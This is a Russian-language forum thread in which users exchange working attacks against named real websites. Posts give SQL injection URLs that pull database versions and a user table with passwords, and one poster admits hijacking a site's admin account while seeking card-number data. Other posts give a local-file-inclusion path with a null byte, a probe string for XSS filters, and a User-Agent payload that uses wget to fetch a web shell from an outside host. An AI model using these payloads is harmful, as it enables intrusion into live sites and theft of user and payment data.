Есть много способов обхода фильтрации XSS. Лучше скажите, какие символы фильтруются. Попробуйте ввести следующее символы: Code: '';!--"<xss>=&{()} и посмотрите в исходном коде HTML страницы, какие символы отфильтровались, а какие нет.
Как Вы видите, практически все спец. символы фильтруются. Увы, но обойти в Вашем случае фильтрацию нельзя.
народ, чёт не могу тут нечё сделать, подскажите http://www.azyb.net/cgi-bin/jurn/main.cgi?id=877+and%28select+1+from%28select+count%28*%29,concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29--+
Code: http://www.azyb.net/cgi-bin/jurn/main.cgi?id=87/**/and(select+1/**/from(select+count(*),concat((select+table_name/**/from/**/information_schema.tables/**/limit/**/1,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)--+g Access denied for user 'azyb'@'127.0.0.27' to database 'information_schema'. Брути таблицы...
блин, плохо, а тут постоянно переадресация чтобы не ввёл http://www.33hochu.ru/fanclub.php?id=956%27 как с ней справится?
Взгляни лучше сюда: http://www.33hochu.ru/view_foto.php?id=82426'+union+select+version(),database()+--+ Смотреть исходный код страницы. Дальше разберешься? user()=33h database()[email protected] version()=5.5.22-1~dotdeb.0-log
Ошибаешься. Code: http://www.33hochu.ru/view_foto.php?id=33382426'+union+select+table_name,user()+from+information_schema.tables+limit+135,1+--+ И смотришь исходный страницы код между "id_p=" и "¶m". Там очень много таблиц, среди которых заинтересует Code: user = (id,login,login_email,site,nick,password,password_token,status,email,path,name,sex,data_b,url,icq,im,data_reg,data_last,camera,optica,limit_id,foto_in_profile,foto_my,priv_mes,email_reg,rating,avatara,ip,ip_reg,activiti,login_translit id_style,email_pre,email_code_activ,napominalka,kolvomp3,inbox_new,last_notify,counter,cfg_invisible,cfg_autoplaymp3,cfg_hidestatus,cfg_hidevisits,cfg_rndmp3)
Скажите пожалуйста, вот я новичек в этом деле. Вообщем нашол уязвимый сайт, (сюда написать не могу) Вбиваю его в Хавидж, он видит всё, DBs, Tables, Columns, но в одном из пкнктов в Data вместо цифр идут кракозябры, как можно посмотреть эти цифры? Или можно как нибуть выкачать базу?
Скрин прикрепи к сообщению, я хавидж практически не юзаю но ка кто попался мне криво крякнутый и там похожая проблема была..
Скачал но не знаю как запустить, Exeшника нет, он видимо на питоне, а я с ним еще никогда не работал((( кстати мне удалось зайти на сайт от имени админа, изменил логин и пароль админа. Так что сайт ПОКА под моим кантролем. Но вот как выкачать базу или посмотреть этот параметр я хз. Не знаю можно ли тут это обсуждать но мне надо посмотреть параметр Base-order-cardnum))) именно эти параметры отображаються кракозябрами)))
Я не знаю ничего про заливку шелла, новичек я еще, может подскажите как это организовть? Скажу точно что сайт стоит на CMS php-nuke, версия ХЗ хотя и это я определил лиш по структуре ссылок https://www.site.com/admin.php?op=config https://www.site.com/admin.php?op=users https://www.site.com/safe.php?op=pos_order
Можно ли как-то залить шелл? http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/environ
Правильнее будет вот так: Code: http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/environ%00 Увы, но скорее всего Вам не удастся залить шелл. Попробуйте определить версию форума, далее ищите эксплоиты. Особенно уязвима версия 7.8, удачного поиска. UPD: Если Вы нашли sql inj, то попробуйте узнать логин и пароль администратора, желательно руками. Пару ссылок: 23.3.2. SQL injection with PHP-Nuke SQL inj PHP-Nuke: Module EasyContent SQL Inj PHPNuke x <= 7.8 7.1.0 SQL inj
У вас в конце нулл-байт отвалился. Что касается шелла, то, по идее, права у вас есть. Но я бы попробовал залить вот сюда PHP: http://vincity.info/index.php?option=com_jesubmit&view=../../../../../../../../../../proc/self/fd/2%00 (лог ошибок). Как это сделать? Путем формирования User-Agent'а, примерно такого вида: PHP: <?system('wget http://твой_хост_с_шеллом/shell.txt -O shell.php');?>